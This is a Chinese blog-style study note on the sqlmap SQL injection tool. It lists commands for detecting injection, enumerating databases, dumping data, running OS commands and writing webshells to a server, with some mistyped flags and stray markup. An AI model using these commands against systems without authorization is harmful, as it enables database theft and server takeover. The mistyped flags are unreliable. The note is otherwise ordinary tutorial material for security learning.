###sqlmap的功能
引用漏洞人生的博客:Sqlmap使用教程【个人笔记精华整理】
这里我不做过多阐述,我在这里分享我在i春秋学到的教程:
课程地址
###教程分享(sqlmap初级实用教程)
sqlmap三种请求类型的注入探测: (1)get注入检测:get请求
在URL链接中显示并传输数据的方式sqlmap get注入语句sqlmap -u "url"(2)post注入检测: post请求sqlmap -u "url --data "post数据"(3)cookie注入:sqlmap -u "url" --cookie "cookie数据"获取数据库相关信息:<1>获取数据库的数据类型以及版本:常见的数据库类型:sql sever,mysql,orcle,postgresql <2>sqlmap 查看数据库
sqlmap -u "url"->back- end dbms <3>获取数据库名和用户名:1.各类数据库结构 access-库-表1,表2.表3(一个库);sql sever库1-表1,表2,表3,库2-表1,…; 2.查数据库名sqlmap -u "url" --current -db3.查用户名sqlmap -u "url" --count -user<3>获取数据库的数据量sqlmap -u "url" --count -D "数据库名"<4>判断用户权限sqlmap -u "url" --privileges技巧:一般只需看用户名: sql sever:sa mysql:root4>3>3>2>1>- MySQL数据注入:1.获取当前库名
--current -db2.获取库中的表名--tables -D "数据库名"3.获取列名--columns -T "表名" -D “列名”4.获取某个列名的字段名原有基础 --dump4.引申一般思路:了解数据库结构->顺推下去 - 管理自己的数据库:1.下载pymysql安装步骤cmd切换目录->setup.py install 2.sqlmap -d “MySQL://用户名:密码@地址:端口/数据库“3.连接上后
--sql-shell进行sql执行管理 - 延时注入的魅力:1.使用情况:页面无变化,布尔无真假,从来不报错 2.使用参数
--delay "时间比如1"或-safe-freq - 交互式命令执行和写webshell:交互式执行必须是最高权限 使用参数
--os-cmd=命令接下来输入网站的绝对路径一直回车即可,执行完命令就会自动删除 (主要是自带的webshell) - Tampere脚本的使用:sqlmap下的tamper目录(进行高级测试)使用参数
--tamper="脚本名"附件脚本文件密码:jp29 - 本地写入webshell:1.sqlmap下创建目录(mst)在目录下创建自己想写的文件 2.参数
--file-write "./mst/mst.txt"(本地文件的地址)--file-dest "目标文件的地址" - 批量检测注入漏洞:结合burp(之后补充)
- sqlmap学习注入技术

